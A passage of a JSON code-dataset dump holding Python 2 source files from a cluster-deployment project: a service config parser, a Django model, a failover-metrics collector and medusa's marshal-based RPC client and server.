cluster_name):\n ServiceConfig.parse_params(self, \"cluster\", cluster_dict, CLUSTER_SCHEMA)\n\n self.jobs = self.jobs.split()\n if self.name != cluster_name:\n Log.print_critical(\n \"Cluster name in config doesn't match the config file name: \"\n \"%s vs. %s\" % (self.name, cluster_name))\n reg_expr = CLUSTER_NAME_REGEX.match(self.name)\n if not reg_expr:\n Log.print_critical(\"Illegal cluster name: %s\" % self.name)\n self.zk_cluster = reg_expr.group(\"zk\")\n\n class Jobs:\n '''\n The class represents all the jobs of a service\n '''\n def __init__(self, job_dict, job_name):\n self.name = job_name\n self.job_dict = job_dict\n ServiceConfig.parse_params(self, job_name, job_dict, COMMON_JOB_SCHEMA)\n if self.base_port % 100 != 0:\n Log.print_critical(\"base_port %d is NOT a multiple of 100!\" %\n self.base_port)\n\n self._parse_hosts_list(job_dict, job_name)\n\n def _parse_hosts_list(self, job_dict, job_name):\n '''\n Parse the hosts list for job\n '''\n self.hosts = {}\n self.hostnames = {}\n for name, value in job_dict.iteritems():\n reg_expr = HOST_RULE_REGEX.match(name)\n if not reg_expr:\n continue\n host_id = int(reg_expr.group(\"id\"))\n self.hosts[host_id] = ServiceConfig.Jobs.Hosts(value)\n\n ip = self.hosts[host_id].ip\n try:\n self.hostnames[host_id] = socket.gethostbyaddr(ip)[0]\n except:\n self.hostnames[host_id] = ip\n\n instance_num = self.hosts[host_id].instance_num\n if instance_num > 1 and job_name not in MULTIPLE_INSTANCES_JOBS:\n Log.print_critical(\"The job %s doesn't support for multiple instances\" \\\n \" on the same host. Please check your config.\" % job_name)\n\n def _generate_arguments_list(self, job_dict, job_name, arguments_dict):\n '''\n Generate the arguments lists as follows:\n job.jvm_args, job.system_properties, job.main_entry, job.extra_args.\n '''\n # prevent repeated generation for one job on different hosts/instances\n if any(getattr(self, args_type, None) != None for args_type in ARGUMENTS_TYPE_LIST):\n return\n\n if not job_dict.has_key(\"arguments\"):\n Log.print_critical(\"The job %s must be configured with the `arguments` section.\" \\\n \" Please check your configuration file.\" % job_name)\n\n job_specific_arguments = job_dict[\"arguments\"]\n job_common_arguments = arguments_dict[job_name]\n service_common_arguments = arguments_dict[\"service_common\"]\n\n self._merge_arguments_dict(job_common_arguments, service_common_arguments)\n self._merge_arguments_dict(job_specific_arguments, job_common_arguments)\n\n # set job's attributes: job.jvm_args, job.system_properties, job.main_entry, job.extra_args\n for args_type in ARGUMENTS_TYPE_LIST:\n setattr(self, args_type, job_specific_arguments[args_type])\n\n def _get_argument_key(self, argument):\n # argument is a 'key=value' pair\n if argument.find('=') != -1:\n return argument.split('=')[0]\n else:\n # argument is a member of HEAP_MEMORY_SETTING_LIST\n for member in HEAP_MEMORY_SETTING_LIST:\n if argument.startswith(member):\n return member\n # argument is a normal string without '='\n return argument\n\n def _check_and_insert_argument(self, arguments_list, argument):\n '''\n Insert the argument into the arguments_list if\n the arguments_list doesn't contain the argument.\n '''\n argument_key = self._get_argument_key(argument)\n\n for item in arguments_list:\n item_key = self._get_argument_key(item)\n if item_key == argument_key:\n return\n arguments_list.append(argument)\n\n def _merge_arguments_dict(self, child_arguments_dict, base_arguments_dict):\n '''\n Merge the arguments from the base_arguments_dict to child_arguments_dict,\n for duplicate items, use the child item to override the base item.\n '''\n for args_type in ARGUMENTS_TYPE_LIST:\n base_arguments_list = base_arguments_dict[args_type]\n if type(base_arguments_list) == str:\n base_arguments_list = base_arguments_list.split()\n\n child_arguments_list = []\n if child_arguments_dict.has_key(args_type):\n child_arguments_list = child_arguments_dict[args_type].split()\n\n for argument in base_arguments_list:\n self._check_and_insert_argument(child_arguments_list, argument)\n\n child_arguments_dict[args_type] = child_arguments_list\n\n def _generate_string_format_arguments(self, args, cluster, jobs,\n current_job=\"\", host_id=0, instance_id=-1):\n '''\n Parse the arguments list and generate/joint the string format arguments.\n All items in the arguments are connected with ' '.\n '''\n arguments_string = \"\"\n for type_id in range(len(ARGUMENTS_TYPE_LIST)):\n args_list = copy.deepcopy(getattr(self, ARGUMENTS_TYPE_LIST[type_id]))\n for argument_id in range(len(args_list)):\n if args_list[argument_id].find('%') != -1:\n args_list[argument_id] = ServiceConfig.parse_item(\n args, cluster, jobs, args.service, current_job, host_id,\n instance_id, args_list[argument_id])\n\n # joint the arguments string\n arguments_string += \" \".join(args_list)\n if type_id < len(ARGUMENTS_TYPE_LIST) - 1:\n arguments_string += \" \"\n\n return arguments_string\n\n def get_arguments(self, args, cluster, jobs, arguments_dict, current_job=\"\",\n host_id=0, instance_id=-1):\n self._generate_arguments_list(self.job_dict, self.name, arguments_dict)\n return self._generate_string_format_arguments(args, cluster, jobs,\n current_job, host_id, instance_id)\n\n class Hosts:\n '''\n The class represents all the hosts of a job\n '''\n def __init__(self, attribute_str):\n # parse the host attributes\n self._parse_host_attributes(attribute_str)\n\n def _parse_host_attributes(self, attribute_str):\n attribute_list = attribute_str.split('/')\n attribute_dict = {}\n\n # parse the attribute_str\n attribute_dict['ip'] = attribute_list[0]\n\n for attribute_item in attribute_list[1:]:\n if attribute_item.find('=') == -1:\n Log.print_critical(\"The host attributes definition are wrong.\" \\\n \" Please check your configuration file.\")\n attribute_name, attribute_val = attribute_item.split('=')\n attribute_dict[attribute_name] = attribute_val\n\n # check the essential attributes 'instance'\n instance_num = int(attribute_dict.get('instance_num', 1))\n if instance_num < 1:\n Log.print_critical(\"The instance number must be greater than or equal to 1!\")\n attribute_dict['instance_num'] = instance_num # store 'int' type\n\n # set the host attributes\n for attribute_name, attribute_val in attribute_dict.iteritems():\n setattr(self, attribute_name, attribute_val)\n\n class Configuration:\n '''\n The class represents all the config files to be generated of a service\n '''\n def __init__(self, configuration_dict, args, cluster, jobs):\n self.config_section_dict = configuration_dict\n self.raw_files, self.generated_files = ServiceConfig.parse_raw_files(\n self.config_section_dict, args, cluster, jobs)\n\n def get_config_dict_full(self, config_path):\n '''\n Get the whole configuration dict: reading the base common-config and\n using the child_config_dict to update the base_config_dict\n\n @param config_path The path for configuration file\n @return dict The whole configuration dict\n '''\n base_config_dict = {}\n child_config_dict = ConfigObj(config_path, file_error=True)\n arguments_config_dict = {}\n\n if child_config_dict['configuration'].has_key('base'):\n config_path = child_config_dict['configuration']['base']\n if config_path.find('%') != -1:\n config_path = self.parse_item(None, None, None, item=config_path)\n\n base_config_dict = self.get_config_dict_full(config_path)\n child_configuration_dict = child_config_dict['configuration']\n base_configuration_dict = base_config_dict['configuration']\n\n for file_name, file_dict in base_configuration_dict.iteritems():\n if file_name in child_configuration_dict:\n file_dict.update(child_configuration_dict[file_name])\n\n base_config_dict['configuration'].update(base_configuration_dict)\n child_config_dict.update(base_config_dict)\n return child_config_dict\n\n\n @staticmethod\n def parse_params(namespace, section_name, section_dict, schema):\n '''\n Parse the parameters specified by the schema dict from the specific section dict\n '''\n for param_name, param_def in schema.iteritems():\n if param_name in section_dict:\n if param_def[0] is bool:\n param_value = section_dict.as_bool(param_name)\n elif param_def[0] is int:\n param_value = section_dict.as_int(param_name)\n elif param_def[0] is float:\n param_value = section_dict.as_float(param_name)\n else:\n param_value = section_dict[param_name]\n else:\n # option not found, use the default value if there is.\n if param_def[1] is None:\n Log.print_critical(\"required option %s missed in section %s!\" %\n (param_name, section_name))\n else:\n param_value = param_def[1]\n setattr(namespace, param_name, param_value)\n\n\n @staticmethod\n def parse_item(args, cluster, jobs, parsing_service=\"\", current_job=\"\",\n host_id=0, instance_id=-1, item=None):\n '''\n Parse item which is enclosed by '%{}' in key/value\n '''\n reg_expr = VARIABLE_REGEX.findall(item)\n new_item = []\n for iter in range(len(reg_expr)):\n for key, callback in SCHEMA_MAP.iteritems():\n if reg_expr[iter] == key:\n new_item.append(callback(args, cluster, jobs, current_job, host_id))\n break\n elif type(key) == type(VARIABLE_REGEX) and key.match(reg_expr[iter]):\n new_item.append(callback(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, reg_expr[iter]))\n break\n for iter in range(len(new_item)):\n item = item.replace(\"%{\"+reg_expr[iter]+\"}\", str(new_item[iter]))\n return item\n\n @staticmethod\n def parse_raw_files(config_section_dict, args, cluster, jobs):\n '''\n Parse and calculate the dict value which contains '%{}',\n and read local configuration files as {file_name : file_content_str}.\n Generate configuration files dict as {file_name : file_dict}\n '''\n raw_files = {}\n generated_files = {}\n for file_name, file_dict in config_section_dict.iteritems():\n if type(file_dict) == str:\n file_dict = ServiceConfig.parse_item(args, cluster, jobs, item=file_dict)\n if os.path.exists(file_dict):\n raw_files[file_name] = open(file_dict).read()\n else:\n raw_files[file_name] = str()\n else:\n generated_files[file_name] = file_dict\n\n return raw_files, generated_files\n\n @staticmethod\n def parse_list_type_value(list_type_value, args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id):\n for item_index in range(len(list_type_value)):\n if list_type_value[item_index].find('%') != -1:\n value_item = ServiceConfig.parse_item(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, list_type_value[item_index])\n list_type_value[item_index] = value_item\n\n return list_type_value\n\n @staticmethod\n def parse_generated_files(config_section_dict, args, parsing_service,\n cluster, jobs, current_job, host_id, instance_id):\n '''\n Parse and calculate key/value which contains '%{}',\n update the generated files according to the instance_id\n '''\n generated_files = {}\n for file_name, file_dict in config_section_dict.iteritems():\n if isinstance(file_dict, dict):\n for key, value in file_dict.iteritems():\n if key.find('%') != -1:\n file_dict.pop(key)\n key = ServiceConfig.parse_item(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, key)\n file_dict[key] = value\n if isinstance(value, list):\n file_dict[key] = ServiceConfig.parse_list_type_value(value, args,\n cluster, jobs, parsing_service, current_job, host_id, instance_id)\n elif value.find('%') != -1:\n file_dict[key] = ServiceConfig.parse_item(args, cluster, jobs,\n parsing_service, current_job, host_id, instance_id, value)\n generated_files[file_name] = file_dict\n return generated_files\n\n\n def parse_generated_config_files(self, args, current_job=\"\", host_id=0, instance_id=-1):\n '''\n Parse the configuration section for the specified task.\n '''\n config_section_dict = copy.deepcopy(self.configuration_dict)\n self.configuration.generated_files.update(\n ServiceConfig.parse_generated_files(config_section_dict,\n args, self.service, self.cluster, self.jobs, current_job, host_id, instance_id))\n\n"
},
{
"alpha_fraction": 0.685245931148529,
"alphanum_fraction": 0.6967213153839111,
"avg_line_length": 28.047618865966797,
"blob_id": "51e0588cd19065321f1bad3333fe220ff5040a69",
"content_id": "0a29a49a02202c8d7cfdf89f22221bdff9c47579",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 610,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 21,
"path": "/owl/business/models.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom django.db import models\n\nclass Business(models.Model):\n # The buisness name, sms/miliao/...\n business = models.CharField(max_length=32)\n # The hbase cluster name\n cluster = models.CharField(max_length=32)\n # The tables of business\n tables = models.CharField(max_length=32)\n # The server write or read data from hbase\n access_server = models.TextField()\n # The discription\n description = models.TextField()\n\n def getCounterGroup(self):\n return u\"infra-hbase-business-%s\" % (self.business)\n\n def __unicode__(self):\n return u\"%s/%s\" % (self.business, self.cluster)\n"
},
{
"alpha_fraction": 0.6757251620292664,
"alphanum_fraction": 0.677251935005188,
"avg_line_length": 38.45783233642578,
"blob_id": "a102af2857460be4fc2f1eef470d34a1b55aa1f0",
"content_id": "6a13017261753eff5c52b5e38c6c01d87d87e3a3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3275,
"license_type": "permissive",
"max_line_length": 215,
"num_lines": 83,
"path": "/owl/failover_framework/management/commands/failover_framework_collect.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport json\nimport logging\nimport os\nimport owl_config\nimport smtplib\nimport time\nimport urllib2\nimport utils.mail\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom failover_framework.models import Action\nfrom failover_framework.models import Task\n\nlogger = logging.getLogger(__name__)\n\n# Collect metrics from failover framework and insert into database periodically\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n\n if len(args) >= 1:\n logger.warning(\"No need to give args for this script\")\n\n mailer = utils.mail.Mailer(options)\n host = settings.FAILOVER_FRAMEWORK_HOST\n port = settings.FAILOVER_FRAMEWORK_PORT\n host_port = host + \":\" + str(port)\n period = settings.FAILOVER_FRAMEWORK_PERIOD\n\n while True:\n start_time = time.time()\n self.collect_failover_framework_metrics(host_port, mailer)\n sleep_time = period - (time.time() - start_time)\n if sleep_time >= 0:\n logger.info(\"Sleep \" + str(sleep_time) + \" seconds for next time to collect metrics\")\n time.sleep(sleep_time)\n else:\n logger.warning(\"Period is too short to collect metrics\")\n\n def collect_failover_framework_metrics(self, host_port, mailer):\n try:\n # download json \n metricsString = urllib2.urlopen(\"http://\" + host_port + \"/jmx\")\n metrics = json.load(metricsString)\n\n # process json\n actions_info = []\n for metric in metrics[\"beans\"]:\n # Task Metrics\n if \"ActionsInfo\" in metric: # the Task metric\n task_start_timestamp = metric[\"StartTimestamp\"]\n task_start_time = metric[\"StartTime\"]\n task_action_number = metric[\"ActionNumber\"]\n actions_info = metric[\"ActionsInfo\"]\n # Status Metrics\n elif \"ClusterHealthy\" in metric:\n task_cluster_healthy = True if metric[\"ClusterHealthy\"] else False # int to boolean\n task_data_consistent = True if metric[\"DataConsistent\"] else Fasle\n task_success = task_cluster_healthy and task_data_consistent\n\n # insert into database\n task = Task(start_timestamp=task_start_timestamp, start_time=task_start_time, action_number=task_action_number, cluster_healthy=task_cluster_healthy, data_consistent=task_data_consistent, success=task_success)\n task.save()\n logger.info(\"Insert Task into database which start at \" + task_start_time)\n\n for action_info in actions_info:\n action = Action(task_id=task_start_timestamp, start_time=task_start_time, name=action_info[\"name\"], success=action_info[\"success\"], consume_time=action_info[\"consumeTime\"])\n action.save()\n logger.info(\"Insert Action into database which is \" + action.name)\n\n # send email\n if task_success == False:\n email_to = owl_config.FAILOVER_TO_EMAIL\n content = \"Cluster healthy is \" + str(task_cluster_healthy) + \" and data consistent is \" + str(task_data_consistent) + \".\\nGo to owl for more details.\"\n logger.warning(\"Failover test fails, send email to \" + email_to)\n mailer.send_email(content, \"Failover Test Fails\", to_mail)\n\n except:\n logger.warning(\"Can't get metrics from \" + host_port + \", maybe failover framework is not running\")\n"
},
{
"alpha_fraction": 0.520512580871582,
"alphanum_fraction": 0.5297096371650696,
"avg_line_length": 30.01602554321289,
"blob_id": "a9f0b147ea4bf0e429124dd604467b1ffc463687",
"content_id": "f3ea834b8add5081a611fd4fd4321fb94af690cb",
"detected_licenses": [
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor",
"HPND",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9677,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 312,
"path": "/supervisor/supervisor/medusa/rpc_client.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# Copyright 1999, 2000 by eGroups, Inc.\n#\n# All Rights Reserved\n#\n# Permission to use, copy, modify, and distribute this software and\n# its documentation for any purpose and without fee is hereby\n# granted, provided that the above copyright notice appear in all\n# copies and that both that copyright notice and this permission\n# notice appear in supporting documentation, and that the name of\n# eGroups not be used in advertising or publicity pertaining to\n# distribution of the software without specific, written prior\n# permission.\n#\n# EGROUPS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,\n# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN\n# NO EVENT SHALL EGROUPS BE LIABLE FOR ANY SPECIAL, INDIRECT OR\n# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS\n# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,\n# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN\n# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nimport marshal\nimport socket\nimport string\nimport exceptions\nimport string\nimport sys\n\n#\n# there are three clients in here.\n#\n# 1) rpc client\n# 2) fastrpc client\n# 3) async fastrpc client\n#\n# we hope that *whichever* choice you make, that you will enjoy the\n# excellent hand-made construction, and return to do business with us\n# again in the near future.\n#\n\nclass RPC_Error (exceptions.StandardError):\n pass\n\n# ===========================================================================\n# RPC Client\n# ===========================================================================\n\n# request types:\n# 0 call\n# 1 getattr\n# 2 setattr\n# 3 repr\n# 4 del\n\n\nclass rpc_proxy:\n\n DEBUG = 0\n\n def __init__ (self, conn, oid):\n # route around __setattr__\n self.__dict__['conn'] = conn\n self.__dict__['oid'] = oid\n\n # Warning: be VERY CAREFUL with attribute references, keep\n # this __getattr__ in mind!\n\n def __getattr__ (self, attr):\n # __getattr__ and __call__\n if attr == '__call__':\n # 0 == __call__\n return self.__remote_call__\n elif attr == '__repr__':\n # 3 == __repr__\n return self.__remote_repr__\n elif attr == '__getitem__':\n return self.__remote_getitem__\n elif attr == '__setitem__':\n return self.__remote_setitem__\n elif attr == '__len__':\n return self.__remote_len__\n else:\n # 1 == __getattr__\n return self.__send_request__ (1, attr)\n\n def __setattr__ (self, attr, value):\n return self.__send_request__ (2, (attr, value))\n\n def __del__ (self):\n try:\n self.__send_request__ (4, None)\n except:\n import who_calls\n info = who_calls.compact_traceback()\n print info\n\n def __remote_repr__ (self):\n r = self.__send_request__ (3, None)\n return '<remote object [%s]>' % r[1:-1]\n\n def __remote_call__ (self, *args):\n return self.__send_request__ (0, args)\n\n def __remote_getitem__ (self, key):\n return self.__send_request__ (5, key)\n\n def __remote_setitem__ (self, key, value):\n return self.__send_request__ (6, (key, value))\n\n def __remote_len__ (self):\n return self.__send_request__ (7, None)\n\n _request_types_ = ['call', 'getattr', 'setattr', 'repr', 'del', 'getitem', 'setitem', 'len']\n\n def __send_request__ (self, *args):\n if self.DEBUG:\n kind = args[0]\n print (\n 'RPC: ==> %s:%08x:%s:%s' % (\n self.conn.address,\n self.oid,\n self._request_types_[kind],\n repr(args[1:])\n )\n )\n packet = marshal.dumps ((self.oid,)+args)\n # send request\n self.conn.send_packet (packet)\n # get response\n data = self.conn.receive_packet()\n # types of response:\n # 0: proxy\n # 1: error\n # 2: marshal'd data\n\n kind, value = marshal.loads (data)\n\n if kind == 0:\n # proxy (value == oid)\n if self.DEBUG:\n print 'RPC: <== proxy(%08x)' % (value)\n return rpc_proxy (self.conn, value)\n elif kind == 1:\n raise RPC_Error, value\n else:\n if self.DEBUG:\n print 'RPC: <== %s' % (repr(value))\n return value\n\nclass rpc_connection:\n\n cache = {}\n\n def __init__ (self, address):\n self.address = address\n self.connect ()\n\n def connect (self):\n s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n s.connect (self.address)\n self.socket = s\n\n def receive_packet (self):\n packet_len = string.atoi (self.socket.recv (8), 16)\n packet = []\n while packet_len:\n data = self.socket.recv (8192)\n packet.append (data)\n packet_len = packet_len - len(data)\n return string.join (packet, '')\n\n def send_packet (self, packet):\n self.socket.send ('%08x%s' % (len(packet), packet))\n\ndef rpc_connect (address = ('localhost', 8746)):\n if not rpc_connection.cache.has_key (address):\n conn = rpc_connection (address)\n # get oid of remote object\n data = conn.receive_packet()\n (oid,) = marshal.loads (data)\n rpc_connection.cache[address] = rpc_proxy (conn, oid)\n return rpc_connection.cache[address]\n\n# ===========================================================================\n# fastrpc client\n# ===========================================================================\n\nclass fastrpc_proxy:\n\n def __init__ (self, conn, path=()):\n self.conn = conn\n self.path = path\n\n def __getattr__ (self, attr):\n if attr == '__call__':\n return self.__method_caller__\n else:\n return fastrpc_proxy (self.conn, self.path + (attr,))\n\n def __method_caller__ (self, *args):\n # send request\n packet = marshal.dumps ((self.path, args))\n self.conn.send_packet (packet)\n # get response\n data = self.conn.receive_packet()\n error, result = marshal.loads (data)\n if error is None:\n return result\n else:\n raise RPC_Error, error\n\n def __repr__ (self):\n return '<remote-method-%s at %x>' % (string.join (self.path, '.'), id (self))\n\ndef fastrpc_connect (address = ('localhost', 8748)):\n if not rpc_connection.cache.has_key (address):\n conn = rpc_connection (address)\n rpc_connection.cache[address] = fastrpc_proxy (conn)\n return rpc_connection.cache[address]\n\n# ===========================================================================\n# async fastrpc client\n# ===========================================================================\n\nimport asynchat_25 as asynchat\n\nclass async_fastrpc_client (asynchat.async_chat):\n\n STATE_LENGTH = 'length state'\n STATE_PACKET = 'packet state'\n\n def __init__ (self, address=('idb', 3001)):\n\n asynchat.async_chat.__init__ (self)\n\n if type(address) is type(''):\n family = socket.AF_UNIX\n else:\n family = socket.AF_INET\n\n self.create_socket (family, socket.SOCK_STREAM)\n self.address = address\n self.request_fifo = []\n self.buffer = []\n self.pstate = self.STATE_LENGTH\n self.set_terminator (8)\n self._connected = 0\n self.connect (self.address)\n\n def log (self, *args):\n pass\n\n def handle_connect (self):\n self._connected = 1\n\n def close (self):\n self._connected = 0\n self.flush_pending_requests ('lost connection to rpc server')\n asynchat.async_chat.close(self)\n\n def flush_pending_requests (self, why):\n f = self.request_fifo\n while len(f):\n callback = f.pop(0)\n callback (why, None)\n\n def collect_incoming_data (self, data):\n self.buffer.append (data)\n\n def found_terminator (self):\n self.buffer, data = [], string.join (self.buffer, '')\n\n if self.pstate is self.STATE_LENGTH:\n packet_length = string.atoi (data, 16)\n self.set_terminator (packet_length)\n self.pstate = self.STATE_PACKET\n else:\n # modified to fix socket leak in chat server, 2000-01-27, [email protected]\n #self.set_terminator (8)\n #self.pstate = self.STATE_LENGTH\n error, result = marshal.loads (data)\n callback = self.request_fifo.pop(0)\n callback (error, result)\n self.close() # for chat server\n\n def call_method (self, method, args, callback):\n if not self._connected:\n # might be a unix socket...\n family, type = self.family_and_type\n self.create_socket (family, type)\n self.connect (self.address)\n # push the request out the socket\n path = string.split (method, '.')\n packet = marshal.dumps ((path, args))\n self.push ('%08x%s' % (len(packet), packet))\n self.request_fifo.append(callback)\n\n\nif __name__ == '__main__':\n if '-f' in sys.argv:\n connect = fastrpc_connect\n else:\n connect = rpc_connect\n\n print 'connecting...'\n c = connect()\n print 'calling <remote>.calc.sum (1,2,3)'\n print c.calc.sum (1,2,3)\n print 'calling <remote>.calc.nonexistent(), expect an exception!'\n print c.calc.nonexistent()\n"
},
{
"alpha_fraction": 0.5129720568656921,
"alphanum_fraction": 0.5217870473861694,
"avg_line_length": 30.00310516357422,
"blob_id": "aa7ec2c1bcb5b04de2775833dc6fb0c56695e8e4",
"content_id": "9227029431dbbfd670adf55d759c99faaf500443",
"detected_licenses": [
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor",
"HPND",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9983,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 322,
"path": "/supervisor/supervisor/medusa/rpc_server.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# Copyright 1999, 2000 by eGroups, Inc.\n#\n# All Rights Reserved\n#\n# Permission to use, copy, modify, and distribute this software and\n# its documentation for any purpose and without fee is hereby\n# granted, provided that the above copyright notice appear in all\n# copies and that both that copyright notice and this permission\n# notice appear in supporting documentation, and that the name of\n# eGroups not be used in advertising or publicity pertaining to\n# distribution of the software without specific, written prior\n# permission.\n#\n# EGROUPS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,\n# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN\n# NO EVENT SHALL EGROUPS BE LIABLE FOR ANY SPECIAL, INDIRECT OR\n# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS\n# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,\n# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN\n# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n# There are two RPC implementations here.\n\n# The first ('rpc') attempts to be as transparent as possible, and\n# passes along 'internal' methods like __getattr__, __getitem__, and\n# __del__. It is rather 'chatty', and may not be suitable for a\n# high-performance system.\n\n# The second ('fastrpc') is less flexible, but has much less overhead,\n# and is easier to use from an asynchronous client.\n\nimport marshal\nimport socket\nimport string\nimport sys\nimport types\n\nimport asyncore_25 as asyncore\nimport asynchat_25 as asynchat\n\nfrom producers import scanning_producer\nfrom counter import counter\n\nMY_NAME = string.split (socket.gethostname(), '.')[0]\n\n# ===========================================================================\n# RPC server\n# ===========================================================================\n\n# marshal is good for low-level data structures.\n# but when passing an 'object' (any non-marshallable object)\n# we really want to pass a 'reference', which will act on\n# the other side as a proxy. How transparent can we make this?\n\nclass rpc_channel (asynchat.async_chat):\n\n 'Simple RPC server.'\n\n # a 'packet': NNNNNNNNmmmmmmmmmmmmmmmm\n # (hex length in 8 bytes, followed by marshal'd packet data)\n # same protocol used in both directions.\n\n STATE_LENGTH = 'length state'\n STATE_PACKET = 'packet state'\n\n ac_out_buffer_size = 65536\n\n request_counter = counter()\n exception_counter = counter()\n client_counter = counter()\n\n def __init__ (self, root, conn, addr):\n self.root = root\n self.addr = addr\n asynchat.async_chat.__init__ (self, conn)\n self.pstate = self.STATE_LENGTH\n self.set_terminator (8)\n self.buffer = []\n self.proxies = {}\n rid = id(root)\n self.new_reference (root)\n p = marshal.dumps ((rid,))\n # send root oid to the other side\n self.push ('%08x%s' % (len(p), p))\n self.client_counter.increment()\n\n def new_reference (self, object):\n oid = id(object)\n ignore, refcnt = self.proxies.get (oid, (None, 0))\n self.proxies[oid] = (object, refcnt + 1)\n\n def forget_reference (self, oid):\n object, refcnt = self.proxies.get (oid, (None, 0))\n if refcnt > 1:\n self.proxies[oid] = (object, refcnt - 1)\n else:\n del self.proxies[oid]\n\n def log (self, *ignore):\n pass\n\n def collect_incoming_data (self, data):\n self.buffer.append (data)\n\n def found_terminator (self):\n self.buffer, data = [], string.join (self.buffer, '')\n\n if self.pstate is self.STATE_LENGTH:\n packet_length = string.atoi (data, 16)\n self.set_terminator (packet_length)\n self.pstate = self.STATE_PACKET\n else:\n\n self.set_terminator (8)\n self.pstate = self.STATE_LENGTH\n\n oid, kind, arg = marshal.loads (data)\n\n obj, refcnt = self.proxies[oid]\n e = None\n reply_kind = 2\n\n try:\n if kind == 0:\n # __call__\n result = apply (obj, arg)\n elif kind == 1:\n # __getattr__\n result = getattr (obj, arg)\n elif kind == 2:\n # __setattr__\n key, value = arg\n setattr (obj, key, value)\n result = None\n elif kind == 3:\n # __repr__\n result = repr(obj)\n elif kind == 4:\n # __del__\n self.forget_reference (oid)\n result = None\n elif kind == 5:\n # __getitem__\n result = obj[arg]\n elif kind == 6:\n # __setitem__\n (key, value) = arg\n obj[key] = value\n result = None\n elif kind == 7:\n # __len__\n result = len(obj)\n\n except:\n reply_kind = 1\n (file,fun,line), t, v, tbinfo = asyncore.compact_traceback()\n result = '%s:%s:%s:%s (%s:%s)' % (MY_NAME, file, fun, line, t, str(v))\n self.log_info (result, 'error')\n self.exception_counter.increment()\n\n self.request_counter.increment()\n\n # optimize a common case\n if type(result) is types.InstanceType:\n can_marshal = 0\n else:\n can_marshal = 1\n\n try:\n rb = marshal.dumps ((reply_kind, result))\n except ValueError:\n can_marshal = 0\n\n if not can_marshal:\n # unmarshallable object, return a reference\n rid = id(result)\n self.new_reference (result)\n rb = marshal.dumps ((0, rid))\n\n self.push_with_producer (\n scanning_producer (\n ('%08x' % len(rb)) + rb,\n buffer_size = 65536\n )\n )\n\nclass rpc_server_root:\n pass\n\nclass rpc_server (asyncore.dispatcher):\n\n def __init__ (self, root, address = ('', 8746)):\n self.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n self.set_reuse_addr()\n self.bind (address)\n self.listen (128)\n self.root = root\n\n def handle_accept (self):\n conn, addr = self.accept()\n rpc_channel (self.root, conn, addr)\n\n\n# ===========================================================================\n# Fast RPC server\n# ===========================================================================\n\n# no proxies, request consists\n# of a 'chain' of getattrs terminated by a __call__.\n\n# Protocol:\n# <path>.<to>.<object> ( <param1>, <param2>, ... )\n# => ( <value1>, <value2>, ... )\n#\n#\n# (<path>, <params>)\n# path: tuple of strings\n# params: tuple of objects\n\nclass fastrpc_channel (asynchat.async_chat):\n\n 'Simple RPC server'\n\n # a 'packet': NNNNNNNNmmmmmmmmmmmmmmmm\n # (hex length in 8 bytes, followed by marshal'd packet data)\n # same protocol used in both directions.\n\n # A request consists of (<path-tuple>, <args-tuple>)\n # where <path-tuple> is a list of strings (eqv to string.split ('a.b.c', '.'))\n\n STATE_LENGTH = 'length state'\n STATE_PACKET = 'packet state'\n\n def __init__ (self, root, conn, addr):\n self.root = root\n self.addr = addr\n asynchat.async_chat.__init__ (self, conn)\n self.pstate = self.STATE_LENGTH\n self.set_terminator (8)\n self.buffer = []\n\n def log (*ignore):\n pass\n\n def collect_incoming_data (self, data):\n self.buffer.append (data)\n\n def found_terminator (self):\n self.buffer, data = [], string.join (self.buffer, '')\n\n if self.pstate is self.STATE_LENGTH:\n packet_length = string.atoi (data, 16)\n self.set_terminator (packet_length)\n self.pstate = self.STATE_PACKET\n else:\n self.set_terminator (8)\n self.pstate = self.STATE_LENGTH\n (path, params) = marshal.loads (data)\n o = self.root\n\n e = None\n\n try:\n for p in path:\n o = getattr (o, p)\n result = apply (o, params)\n except:\n e = repr (asyncore.compact_traceback())\n result = None\n\n rb = marshal.dumps ((e,result))\n self.push (('%08x' % len(rb)) + rb)\n\nclass fastrpc_server (asyncore.dispatcher):\n\n def __init__ (self, root, 